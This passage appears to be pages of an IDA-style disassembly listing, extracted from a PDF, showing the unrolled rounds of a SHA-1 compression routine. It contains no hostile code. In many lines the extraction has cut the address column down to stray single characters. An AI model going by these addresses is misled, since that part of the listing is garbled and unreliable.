41 CODE: lodsd CODE: rol [esp+280h+var_2e0], 5 CODE: bswap eax CODE: A add edi, [esp+280h+var_2e0] CODE: E mov [esp+280h+var_4a8], eax CODE: mov [esp+280h+var_2e0], edx CODE: xor [esp+280h+var_2e0], ebp CODE: D add edi, eax CODE: F and [esp+280h+var_2e0], ecx CODE: xor [esp+280h+var_2e0], ebp CODE: ror ecx, 2 CODE: A lea edi, [edi+5a827999h] CODE: add edi, [esp+280h+var_2e0] CODE: mov [esp+280h+var_2e0], edi CODE: lodsd CODE: rol [esp+280h+var_2e0], 5 CODE: E bswap eax CODE: add ebp, [esp+280h+var_2e0] CODE: mov [esp+280h+var_4a4], eax CODE: B mov [esp+280h+var_2e0], ecx CODE: F xor [esp+280h+var_2e0], edx CODE:004021A3 add ebp, eax CODE:004021A5 and [esp+280h+var_2e0], ebx CODE:004021A9 xor [esp+280h+var_2e0], edx CODE:004021AD ror ebx, 2 CODE:004021B0 lea ebp, [ebp+5a827999h] CODE:004021B6 add ebp, [esp+280h+var_2e0] CODE:004021BA mov [esp+280h+var_2e0], ebp CODE:004021BE mov eax, [esp+280h+var_4ac] CODE:004021C5 rol [esp+280h+var_2e0], 5 CODE:004021CA xor eax, [esp+280h+var_4c0] CODE:004021D1 add edx, [esp+280h+var_2e0] CODE:004021D5 xor eax, [esp+280h+var_4d8] CODE:004021DC mov [esp+280h+var_2e0], ebx CODE:004021E0 xor eax, [esp+280h+_temp_buffer] CODE:004021E7 xor [esp+280h+var_2e0], ecx CODE:004021EB rol eax, 1 CODE:004021ED and [esp+280h+var_2e0], edi CODE:004021F1 mov [esp+280h+_temp_buffer], eax CODE:004021F8 xor [esp+280h+var_2e0], ecx CODE:004021FC add edx, eax CODE:004021FE ror edi, 2 CODE: lea edx, [edx+5a827999h] CODE: add edx, [esp+280h+var_2e0] CODE: B mov [esp+280h+var_2e0], edx CODE: F mov eax, [esp+280h+var_4a8] CODE: rol [esp+280h+var_2e0], 5 CODE: B xor eax, [esp+280h+var_4bc] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4d4] CODE: D mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4dc] CODE: xor [esp+280h+var_2e0], ebx CODE: C rol eax, 1 CODE: E and [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4dc], eax CODE: xor [esp+280h+var_2e0], ebx

42 CODE: D add ecx, eax CODE: F ror ebp, 2 CODE: lea ecx, [ecx+5a827999h] CODE: add ecx, [esp+280h+var_2e0] CODE: C mov [esp+280h+var_2e0], ecx CODE: mov eax, [esp+280h+var_4a4] CODE: rol [esp+280h+var_2e0], 5 CODE: C xor eax, [esp+280h+var_4b8] CODE: add ebx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4d0] CODE: E mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4d8] CODE: xor [esp+280h+var_2e0], edi CODE: D rol eax, 1 CODE: F and [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4d8], eax CODE: A xor [esp+280h+var_2e0], edi CODE: E add ebx, eax CODE:004022A0 ror edx, 2 CODE:004022A3 lea ebx, [ebx+5a827999h] CODE:004022A9 add ebx, [esp+280h+var_2e0] CODE:004022AD mov [esp+280h+var_2e0], ebx CODE:004022B1 mov eax, [esp+280h+_temp_buffer] CODE:004022B8 rol [esp+280h+var_2e0], 5 CODE:004022BD xor eax, [esp+280h+var_4b4] CODE:004022C4 add edi, [esp+280h+var_2e0] CODE:004022C8 xor eax, [esp+280h+var_4cc] CODE:004022CF mov [esp+280h+var_2e0], edx CODE:004022D3 xor eax, [esp+280h+var_4d4] CODE:004022DA xor [esp+280h+var_2e0], ebp CODE:004022DE rol eax, 1 CODE:004022E0 and [esp+280h+var_2e0], ecx CODE:004022E4 mov [esp+280h+var_4d4], eax CODE:004022EB xor [esp+280h+var_2e0], ebp CODE:004022EF add edi, eax CODE:004022F1 ror ecx, 2 CODE:004022F4 lea edi, [edi+5a827999h] CODE:004022FA add edi, [esp+280h+var_2e0] CODE:004022FE mov [esp+280h+var_2e0], edi CODE: mov eax, [esp+280h+var_4dc] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4b0] CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c8] CODE: mov [esp+280h+var_2e0], ebx CODE: xor eax, [esp+280h+var_4d0] CODE: B xor [esp+280h+var_2e0], ecx CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4d0], eax CODE: C add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax+6ed9eba1h] CODE: A mov [esp+280h+var_2e0], ebp CODE: E mov eax, [esp+280h+var_4d8] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4ac]

43 CODE: add edx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c4] CODE: C mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4cc] CODE: xor [esp+280h+var_2e0], ebx CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4cc], eax CODE: add edx, [esp+280h+var_2e0] CODE: C ror edi, 2 CODE: F lea edx, [edx+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], edx CODE: A mov eax, [esp+280h+var_4d4] CODE:004023A1 rol [esp+280h+var_2e0], 5 CODE:004023A6 xor eax, [esp+280h+var_4a8] CODE:004023AD add ecx, [esp+280h+var_2e0] CODE:004023B1 xor eax, [esp+280h+var_4c0] CODE:004023B8 mov [esp+280h+var_2e0], ebp CODE:004023BC xor eax, [esp+280h+var_4c8] CODE:004023C3 xor [esp+280h+var_2e0], edi CODE:004023C7 rol eax, 1 CODE:004023C9 xor [esp+280h+var_2e0], ebx CODE:004023CD mov [esp+280h+var_4c8], eax CODE:004023D4 add ecx, [esp+280h+var_2e0] CODE:004023D8 ror ebp, 2 CODE:004023DB lea ecx, [ecx+eax+6ed9eba1h] CODE:004023E2 mov [esp+280h+var_2e0], ecx CODE:004023E6 mov eax, [esp+280h+var_4d0] CODE:004023ED rol [esp+280h+var_2e0], 5 CODE:004023F2 xor eax, [esp+280h+var_4a4] CODE:004023F9 add ebx, [esp+280h+var_2e0] CODE:004023FD xor eax, [esp+280h+var_4bc] CODE: mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4c4] CODE: F xor [esp+280h+var_2e0], ebp CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4c4], eax CODE: add ebx, [esp+280h+var_2e0] CODE: ror edx, 2 CODE: lea ebx, [ebx+eax+6ed9eba1h] CODE: E mov [esp+280h+var_2e0], ebx CODE: mov eax, [esp+280h+var_4cc] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+_temp_buffer] CODE: add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b8] CODE: mov [esp+280h+var_2e0], ecx CODE: xor eax, [esp+280h+var_4c0] CODE: B xor [esp+280h+var_2e0], edx CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], ebp CODE: mov [esp+280h+var_4c0], eax CODE: C add edi, [esp+280h+var_2e0] CODE: ror ecx, 2 CODE: lea edi, [edi+eax+6ed9eba1h] CODE: A mov [esp+280h+var_2e0], edi

44 CODE: E mov eax, [esp+280h+var_4c8] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4dc] CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b4] CODE: C mov [esp+280h+var_2e0], ebx CODE:004024A0 xor eax, [esp+280h+var_4bc] CODE:004024A7 xor [esp+280h+var_2e0], ecx CODE:004024AB rol eax, 1 CODE:004024AD xor [esp+280h+var_2e0], edx CODE:004024B1 mov [esp+280h+var_4bc], eax CODE:004024B8 add ebp, [esp+280h+var_2e0] CODE:004024BC ror ebx, 2 CODE:004024BF lea ebp, [ebp+eax+6ed9eba1h] CODE:004024C6 mov [esp+280h+var_2e0], ebp CODE:004024CA mov eax, [esp+280h+var_4c4] CODE:004024D1 rol [esp+280h+var_2e0], 5 CODE:004024D6 xor eax, [esp+280h+var_4d8] CODE:004024DD add edx, [esp+280h+var_2e0] CODE:004024E1 xor eax, [esp+280h+var_4b0] CODE:004024E8 mov [esp+280h+var_2e0], edi CODE:004024EC xor eax, [esp+280h+var_4b8] CODE:004024F3 xor [esp+280h+var_2e0], ebx CODE:004024F7 rol eax, 1 CODE:004024F9 xor [esp+280h+var_2e0], ecx CODE:004024FD mov [esp+280h+var_4b8], eax CODE: add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: B lea edx, [edx+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4c0] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4d4] CODE: add ecx, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4ac] CODE: mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4b4] CODE: F xor [esp+280h+var_2e0], edi CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4b4], eax CODE: add ecx, [esp+280h+var_2e0] CODE: ror ebp, 2 CODE: lea ecx, [ecx+eax+6ed9eba1h] CODE: E mov [esp+280h+var_2e0], ecx CODE: mov eax, [esp+280h+var_4bc] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4d0] CODE: add ebx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4a8] CODE: mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4b0] CODE: B xor [esp+280h+var_2e0], ebp CODE: F rol eax, 1 CODE: xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4b0], eax CODE: C add ebx, [esp+280h+var_2e0]

45 CODE:004025A0 ror edx, 2 CODE:004025A3 lea ebx, [ebx+eax+6ed9eba1h] CODE:004025AA mov [esp+280h+var_2e0], ebx CODE:004025AE mov eax, [esp+280h+var_4b8] CODE:004025B5 rol [esp+280h+var_2e0], 5 CODE:004025BA xor eax, [esp+280h+var_4cc] CODE:004025C1 add edi, [esp+280h+var_2e0] CODE:004025C5 xor eax, [esp+280h+var_4a4] CODE:004025CC mov [esp+280h+var_2e0], ecx CODE:004025D0 xor eax, [esp+280h+var_4ac] CODE:004025D7 xor [esp+280h+var_2e0], edx CODE:004025DB rol eax, 1 CODE:004025DD xor [esp+280h+var_2e0], ebp CODE:004025E1 mov [esp+280h+var_4ac], eax CODE:004025E8 add edi, [esp+280h+var_2e0] CODE:004025EC ror ecx, 2 CODE:004025EF lea edi, [edi+eax+6ed9eba1h] CODE:004025F6 mov [esp+280h+var_2e0], edi CODE:004025FA mov eax, [esp+280h+var_4b4] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4c8] CODE: D add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+_temp_buffer] CODE: mov [esp+280h+var_2e0], ebx CODE: C xor eax, [esp+280h+var_4a8] CODE: xor [esp+280h+var_2e0], ecx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edx CODE: D mov [esp+280h+var_4a8], eax CODE: add ebp, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: B lea ebp, [ebp+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], ebp CODE: mov eax, [esp+280h+var_4b0] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4c4] CODE: add edx, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4dc] CODE: mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4a4] CODE: F xor [esp+280h+var_2e0], ebx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4a4], eax CODE: add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: lea edx, [edx+eax+6ed9eba1h] CODE: E mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4ac] CODE: rol [esp+280h+var_2e0], 5 CODE: E xor eax, [esp+280h+var_4c0] CODE:004026A5 add ecx, [esp+280h+var_2e0] CODE:004026A9 xor eax, [esp+280h+var_4d8] CODE:004026B0 mov [esp+280h+var_2e0], ebp CODE:004026B4 xor eax, [esp+280h+_temp_buffer] CODE:004026BB xor [esp+280h+var_2e0], edi CODE:004026BF rol eax, 1

46 CODE:004026C1 xor [esp+280h+var_2e0], ebx CODE:004026C5 mov [esp+280h+_temp_buffer], eax CODE:004026CC add ecx, [esp+280h+var_2e0] CODE:004026D0 ror ebp, 2 CODE:004026D3 lea ecx, [ecx+eax+6ed9eba1h] CODE:004026DA mov [esp+280h+var_2e0], ecx CODE:004026DE mov eax, [esp+280h+var_4a8] CODE:004026E5 rol [esp+280h+var_2e0], 5 CODE:004026EA xor eax, [esp+280h+var_4bc] CODE:004026F1 add ebx, [esp+280h+var_2e0] CODE:004026F5 xor eax, [esp+280h+var_4d4] CODE:004026FC mov [esp+280h+var_2e0], edx CODE: xor eax, [esp+280h+var_4dc] CODE: xor [esp+280h+var_2e0], ebp CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], edi CODE: mov [esp+280h+var_4dc], eax CODE: add ebx, [esp+280h+var_2e0] CODE: C ror edx, 2 CODE: F lea ebx, [ebx+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], ebx CODE: A mov eax, [esp+280h+var_4a4] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4b8] CODE: D add edi, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4d0] CODE: mov [esp+280h+var_2e0], ecx CODE: C xor eax, [esp+280h+var_4d8] CODE: xor [esp+280h+var_2e0], edx CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], ebp CODE: D mov [esp+280h+var_4d8], eax CODE: add edi, [esp+280h+var_2e0] CODE: ror ecx, 2 CODE: B lea edi, [edi+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], edi CODE: mov eax, [esp+280h+_temp_buffer] CODE: D rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4b4] CODE: add ebp, [esp+280h+var_2e0] CODE: D xor eax, [esp+280h+var_4cc] CODE: mov [esp+280h+var_2e0], ebx CODE: xor eax, [esp+280h+var_4d4] CODE: F xor [esp+280h+var_2e0], ecx CODE:004027A3 rol eax, 1 CODE:004027A5 xor [esp+280h+var_2e0], edx CODE:004027A9 mov [esp+280h+var_4d4], eax CODE:004027B0 add ebp, [esp+280h+var_2e0] CODE:004027B4 ror ebx, 2 CODE:004027B7 lea ebp, [ebp+eax+6ed9eba1h] CODE:004027BE mov [esp+280h+var_2e0], ebp CODE:004027C2 mov eax, [esp+280h+var_4dc] CODE:004027C9 rol [esp+280h+var_2e0], 5 CODE:004027CE xor eax, [esp+280h+var_4b0] CODE:004027D5 add edx, [esp+280h+var_2e0] CODE:004027D9 xor eax, [esp+280h+var_4c8] CODE:004027E0 mov [esp+280h+var_2e0], edi

47 CODE:004027E4 xor eax, [esp+280h+var_4d0] CODE:004027EB xor [esp+280h+var_2e0], ebx CODE:004027EF rol eax, 1 CODE:004027F1 xor [esp+280h+var_2e0], ecx CODE:004027F5 mov [esp+280h+var_4d0], eax CODE:004027FC add edx, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: lea edx, [edx+eax+6ed9eba1h] CODE: A mov [esp+280h+var_2e0], edx CODE: E mov eax, [esp+280h+var_4d8] CODE: rol [esp+280h+var_2e0], 5 CODE: A xor eax, [esp+280h+var_4ac] CODE: add ecx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c4] CODE: C mov [esp+280h+var_2e0], ebp CODE: xor eax, [esp+280h+var_4cc] CODE: xor [esp+280h+var_2e0], edi CODE: B rol eax, 1 CODE: D xor [esp+280h+var_2e0], ebx CODE: mov [esp+280h+var_4cc], eax CODE: add ecx, [esp+280h+var_2e0] CODE: C ror ebp, 2 CODE: F lea ecx, [ecx+eax+6ed9eba1h] CODE: mov [esp+280h+var_2e0], ecx CODE: A mov eax, [esp+280h+var_4d4] CODE: rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4a8] CODE: D add ebx, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4c0] CODE: mov [esp+280h+var_2e0], edx CODE: C xor eax, [esp+280h+var_4c8] CODE: xor [esp+280h+var_2e0], ebp CODE: rol eax, 1 CODE: xor [esp+280h+var_2e0], edi CODE: D mov [esp+280h+var_4c8], eax CODE: add ebx, [esp+280h+var_2e0] CODE: ror edx, 2 CODE: B lea ebx, [ebx+eax+6ed9eba1h] CODE:004028A2 mov [esp+280h+var_2e0], ebx CODE:004028A6 mov eax, [esp+280h+var_4d0] CODE:004028AD rol [esp+280h+var_2e0], 5 CODE:004028B2 xor eax, [esp+280h+var_4a4] CODE:004028B9 add edi, [esp+280h+var_2e0] CODE:004028BD xor eax, [esp+280h+var_4bc] CODE:004028C4 mov [esp+280h+var_2e0], ecx CODE:004028C8 xor eax, [esp+280h+var_4c4] CODE:004028CF xor [esp+280h+var_2e0], edx CODE:004028D3 rol eax, 1 CODE:004028D5 xor [esp+280h+var_2e0], ebp CODE:004028D9 mov [esp+280h+var_4c4], eax CODE:004028E0 add edi, [esp+280h+var_2e0] CODE:004028E4 ror ecx, 2 CODE:004028E7 lea edi, [edi+eax+6ed9eba1h] CODE:004028EE mov [esp+280h+var_2e0], edi CODE:004028F2 mov eax, [esp+280h+var_4cc] CODE:004028F9 rol [esp+280h+var_2e0], 5 CODE:004028FE xor eax, [esp+280h+_temp_buffer]

48 CODE: add ebp, [esp+280h+var_2e0] CODE: xor eax, [esp+280h+var_4b8] CODE: mov [esp+280h+var_2e0], ebx CODE: xor eax, [esp+280h+var_4c0] CODE: B or [esp+280h+var_2e0], ecx CODE: F rol eax, 1 CODE: and [esp+280h+var_2e0], edx CODE: mov [esp+280h+var_4c0], eax CODE: C add ebp, eax CODE: E mov eax, ebx CODE: and eax, ecx CODE: or eax, [esp+280h+var_2e0] CODE: ror ebx, 2 CODE: lea ebp, [ebp+eax-70e44324h] CODE: mov [esp+280h+var_2e0], ebp CODE: mov eax, [esp+280h+var_4c8] CODE: B rol [esp+280h+var_2e0], 5 CODE: xor eax, [esp+280h+var_4dc] CODE: add edx, [esp+280h+var_2e0] CODE: B xor eax, [esp+280h+var_4b4] CODE: mov [esp+280h+var_2e0], edi CODE: xor eax, [esp+280h+var_4bc] CODE: D or [esp+280h+var_2e0], ebx CODE: rol eax, 1 CODE: and [esp+280h+var_2e0], ecx CODE: mov [esp+280h+var_4bc], eax CODE: E add edx, eax CODE: mov eax, edi CODE: and eax, ebx CODE: or eax, [esp+280h+var_2e0] CODE: ror edi, 2 CODE: B lea edx, [edx+eax-70e44324h] CODE: mov [esp+280h+var_2e0], edx CODE: mov eax, [esp+280h+var_4c4] CODE: D rol [esp+280h+var_2e0], 5 CODE:004029A2 xor eax, [esp+280h+var_4d8] CODE:004029A9 add ecx, [esp+280h+var_2e0] CODE:004029AD xor eax, [esp+280h+var_4b0] CODE:004029B4 mov [esp+280h+var_2e0], ebp CODE:004029B8 xor eax, [esp+280h+var_4b8] CODE:004029BF or [esp+280h+var_2e0], edi CODE:004029C3 rol eax, 1 CODE:004029C5 and [esp+280h+var_2e0], ebx CODE:004029C9 mov [esp+280h+var_4b8], eax CODE:004029D0 add ecx, eax CODE:004029D2 mov eax, ebp CODE:004029D4 and eax, edi CODE:004029D6 or eax, [esp+280h+var_2e0] CODE:004029DA ror ebp, 2 CODE:004029DD lea ecx, [ecx+eax-70e44324h] CODE:004029E4 mov [esp+280h+var_2e0], ecx CODE:004029E8 mov eax, [esp+280h+var_4c0] CODE:004029EF rol [esp+280h+var_2e0], 5 CODE:004029F4 xor eax, [esp+280h+var_4d4] CODE:004029FB add ebx, [esp+280h+var_2e0] CODE:004029FF xor eax, [esp+280h+var_4ac] CODE:00402A06 mov [esp+280h+var_2e0], edx

49 CODE:00402A0A xor eax, [esp+280h+var_4b4] CODE:00402A11 or [esp+280h+var_2e0], ebp CODE:00402A15 rol eax, 1 CODE:00402A17 and [esp+280h+var_2e0], edi CODE:00402A1B mov [esp+280h+var_4b4], eax CODE:00402A22 add ebx, eax CODE:00402A24 mov eax, edx CODE:00402A26 and eax, ebp CODE:00402A28 or eax, [esp+280h+var_2e0] CODE:00402A2C ror edx, 2 CODE:00402A2F lea ebx, [ebx+eax-70e44324h] CODE:00402A36 mov [esp+280h+var_2e0], ebx CODE:00402A3A mov eax, [esp+280h+var_4bc] CODE:00402A41 rol [esp+280h+var_2e0], 5 CODE:00402A46 xor eax, [esp+280h+var_4d0] CODE:00402A4D add edi, [esp+280h+var_2e0] CODE:00402A51 xor eax, [esp+280h+var_4a8] CODE:00402A58 mov [esp+280h+var_2e0], ecx CODE:00402A5C xor eax, [esp+280h+var_4b0] CODE:00402A63 or [esp+280h+var_2e0], edx CODE:00402A67 rol eax, 1 CODE:00402A69 and [esp+280h+var_2e0], ebp CODE:00402A6D mov [esp+280h+var_4b0], eax CODE:00402A74 add edi, eax CODE:00402A76 mov eax, ecx CODE:00402A78 and eax, edx CODE:00402A7A or eax, [esp+280h+var_2e0] CODE:00402A7E ror ecx, 2 CODE:00402A81 lea edi, [edi+eax-70e44324h] CODE:00402A88 mov [esp+280h+var_2e0], edi CODE:00402A8C mov eax, [esp+280h+var_4b8] CODE:00402A93 rol [esp+280h+var_2e0], 5 CODE:00402A98 xor eax, [esp+280h+var_4cc] CODE:00402A9F add ebp, [esp+280h+var_2e0] CODE:00402AA3 xor eax, [esp+280h+var_4a4] CODE:00402AAA mov [esp+280h+var_2e0], ebx CODE:00402AAE xor eax, [esp+280h+var_4ac] CODE:00402AB5 or [esp+280h+var_2e0], ecx CODE:00402AB9 rol eax, 1 CODE:00402ABB and [esp+280h+var_2e0], edx CODE:00402ABF mov [esp+280h+var_4ac], eax CODE:00402AC6 add ebp, eax CODE:00402AC8 mov eax, ebx CODE:00402ACA and eax, ecx CODE:00402ACC or eax, [esp+280h+var_2e0] CODE:00402AD0 ror ebx, 2 CODE:00402AD3 lea ebp, [ebp+eax-70e44324h] CODE:00402ADA mov [esp+280h+var_2e0], ebp CODE:00402ADE mov eax, [esp+280h+var_4b4] CODE:00402AE5 rol [esp+280h+var_2e0], 5 CODE:00402AEA xor eax, [esp+280h+var_4c8] CODE:00402AF1 add edx, [esp+280h+var_2e0] CODE:00402AF5 xor eax, [esp+280h+_temp_buffer] CODE:00402AFC mov [esp+280h+var_2e0], edi CODE:00402B00 xor eax, [esp+280h+var_4a8] CODE:00402B07 or [esp+280h+var_2e0], ebx CODE:00402B0B rol eax, 1

50 CODE:00402B0D and [esp+280h+var_2e0], ecx CODE:00402B11 mov [esp+280h+var_4a8], eax CODE:00402B18 add edx, eax CODE:00402B1A mov eax, edi CODE:00402B1C and eax, ebx CODE:00402B1E or eax, [esp+280h+var_2e0] CODE:00402B22 ror edi, 2 CODE:00402B25 lea edx, [edx+eax-70e44324h] CODE:00402B2C mov [esp+280h+var_2e0], edx CODE:00402B30 mov eax, [esp+280h+var_4b0] CODE:00402B37 rol [esp+280h+var_2e0], 5 CODE:00402B3C xor eax, [esp+280h+var_4c4] CODE:00402B43 add ecx, [esp+280h+var_2e0] CODE:00402B47 xor eax, [esp+280h+var_4dc] CODE:00402B4E mov [esp+280h+var_2e0], ebp CODE:00402B52 xor eax, [esp+280h+var_4a4] CODE:00402B59 or [esp+280h+var_2e0], edi CODE:00402B5D rol eax, 1 CODE:00402B5F and [esp+280h+var_2e0], ebx CODE:00402B63 mov [esp+280h+var_4a4], eax CODE:00402B6A add ecx, eax CODE:00402B6C mov eax, ebp CODE:00402B6E and eax, edi CODE:00402B70 or eax, [esp+280h+var_2e0] CODE:00402B74 ror ebp, 2 CODE:00402B77 lea ecx, [ecx+eax-70e44324h] CODE:00402B7E mov [esp+280h+var_2e0], ecx CODE:00402B82 mov eax, [esp+280h+var_4ac] CODE:00402B89 rol [esp+280h+var_2e0], 5 CODE:00402B8E xor eax, [esp+280h+var_4c0] CODE:00402B95 add ebx, [esp+280h+var_2e0] CODE:00402B99 xor eax, [esp+280h+var_4d8] CODE:00402BA0 mov [esp+280h+var_2e0], edx CODE:00402BA4 xor eax, [esp+280h+_temp_buffer] CODE:00402BAB or [esp+280h+var_2e0], ebp CODE:00402BAF rol eax, 1 CODE:00402BB1 and [esp+280h+var_2e0], edi CODE:00402BB5 mov [esp+280h+_temp_buffer], eax CODE:00402BBC add ebx, eax CODE:00402BBE mov eax, edx CODE:00402BC0 and eax, ebp CODE:00402BC2 or eax, [esp+280h+var_2e0] CODE:00402BC6 ror edx, 2 CODE:00402BC9 lea ebx, [ebx+eax-70e44324h] CODE:00402BD0 mov [esp+280h+var_2e0], ebx CODE:00402BD4 mov eax, [esp+280h+var_4a8] CODE:00402BDB rol [esp+280h+var_2e0], 5 CODE:00402BE0 xor eax, [esp+280h+var_4bc] CODE:00402BE7 add edi, [esp+280h+var_2e0] CODE:00402BEB xor eax, [esp+280h+var_4d4] CODE:00402BF2 mov [esp+280h+var_2e0], ecx CODE:00402BF6 xor eax, [esp+280h+var_4dc] CODE:00402BFD or [esp+280h+var_2e0], edx CODE:00402C01 rol eax, 1 CODE:00402C03 and [esp+280h+var_2e0], ebp CODE:00402C07 mov [esp+280h+var_4dc], eax CODE:00402C0E add edi, eax

51 CODE:00402C10 mov eax, ecx CODE:00402C12 and eax, edx CODE:00402C14 or eax, [esp+280h+var_2e0] CODE:00402C18 ror ecx, 2 CODE:00402C1B lea edi, [edi+eax-70e44324h] CODE:00402C22 mov [esp+280h+var_2e0], edi CODE:00402C26 mov eax, [esp+280h+var_4a4] CODE:00402C2D rol [esp+280h+var_2e0], 5 CODE:00402C32 xor eax, [esp+280h+var_4b8] CODE:00402C39 add ebp, [esp+280h+var_2e0] CODE:00402C3D xor eax, [esp+280h+var_4d0] CODE:00402C44 mov [esp+280h+var_2e0], ebx CODE:00402C48 xor eax, [esp+280h+var_4d8] CODE:00402C4F or [esp+280h+var_2e0], ecx CODE:00402C53 rol eax, 1 CODE:00402C55 and [esp+280h+var_2e0], edx CODE:00402C59 mov [esp+280h+var_4d8], eax CODE:00402C60 add ebp, eax CODE:00402C62 mov eax, ebx CODE:00402C64 and eax, ecx CODE:00402C66 or eax, [esp+280h+var_2e0] CODE:00402C6A ror ebx, 2 CODE:00402C6D lea ebp, [ebp+eax-70e44324h] CODE:00402C74 mov [esp+280h+var_2e0], ebp CODE:00402C78 mov eax, [esp+280h+_temp_buffer] CODE:00402C7F rol [esp+280h+var_2e0], 5 CODE:00402C84 xor eax, [esp+280h+var_4b4] CODE:00402C8B add edx, [esp+280h+var_2e0] CODE:00402C8F xor eax, [esp+280h+var_4cc] CODE:00402C96 mov [esp+280h+var_2e0], edi CODE:00402C9A xor eax, [esp+280h+var_4d4] CODE:00402CA1 or [esp+280h+var_2e0], ebx CODE:00402CA5 rol eax, 1 CODE:00402CA7 and [esp+280h+var_2e0], ecx CODE:00402CAB mov [esp+280h+var_4d4], eax CODE:00402CB2 add edx, eax CODE:00402CB4 mov eax, edi CODE:00402CB6 and eax, ebx CODE:00402CB8 or eax, [esp+280h+var_2e0] CODE:00402CBC ror edi, 2 CODE:00402CBF lea edx, [edx+eax-70e44324h] CODE:00402CC6 mov [esp+280h+var_2e0], edx CODE:00402CCA mov eax, [esp+280h+var_4dc] CODE:00402CD1 rol [esp+280h+var_2e0], 5 CODE:00402CD6 xor eax, [esp+280h+var_4b0] CODE:00402CDD add ecx, [esp+280h+var_2e0] CODE:00402CE1 xor eax, [esp+280h+var_4c8] CODE:00402CE8 mov [esp+280h+var_2e0], ebp CODE:00402CEC xor eax, [esp+280h+var_4d0] CODE:00402CF3 or [esp+280h+var_2e0], edi CODE:00402CF7 rol eax, 1 CODE:00402CF9 and [esp+280h+var_2e0], ebx CODE:00402CFD mov [esp+280h+var_4d0], eax CODE:00402D04 add ecx, eax CODE:00402D06 mov eax, ebp CODE:00402D08 and eax, edi CODE:00402D0A or eax, [esp+280h+var_2e0]

52 CODE:00402D0E ror ebp, 2 CODE:00402D11 lea ecx, [ecx+eax-70e44324h] CODE:00402D18 mov [esp+280h+var_2e0], ecx CODE:00402D1C mov eax, [esp+280h+var_4d8] CODE:00402D23 rol [esp+280h+var_2e0], 5 CODE:00402D28 xor eax, [esp+280h+var_4ac] CODE:00402D2F add ebx, [esp+280h+var_2e0] CODE:00402D33 xor eax, [esp+280h+var_4c4] CODE:00402D3A mov [esp+280h+var_2e0], edx CODE:00402D3E xor eax, [esp+280h+var_4cc] CODE:00402D45 or [esp+280h+var_2e0], ebp CODE:00402D49 rol eax, 1 CODE:00402D4B and [esp+280h+var_2e0], edi CODE:00402D4F mov [esp+280h+var_4cc], eax CODE:00402D56 add ebx, eax CODE:00402D58 mov eax, edx CODE:00402D5A and eax, ebp CODE:00402D5C or eax, [esp+280h+var_2e0] CODE:00402D60 ror edx, 2 CODE:00402D63 lea ebx, [ebx+eax-70e44324h] CODE:00402D6A mov [esp+280h+var_2e0], ebx CODE:00402D6E mov eax, [esp+280h+var_4d4] CODE:00402D75 rol [esp+280h+var_2e0], 5 CODE:00402D7A xor eax, [esp+280h+var_4a8] CODE:00402D81 add edi, [esp+280h+var_2e0] CODE:00402D85 xor eax, [esp+280h+var_4c0] CODE:00402D8C mov [esp+280h+var_2e0], ecx CODE:00402D90 xor eax, [esp+280h+var_4c8] 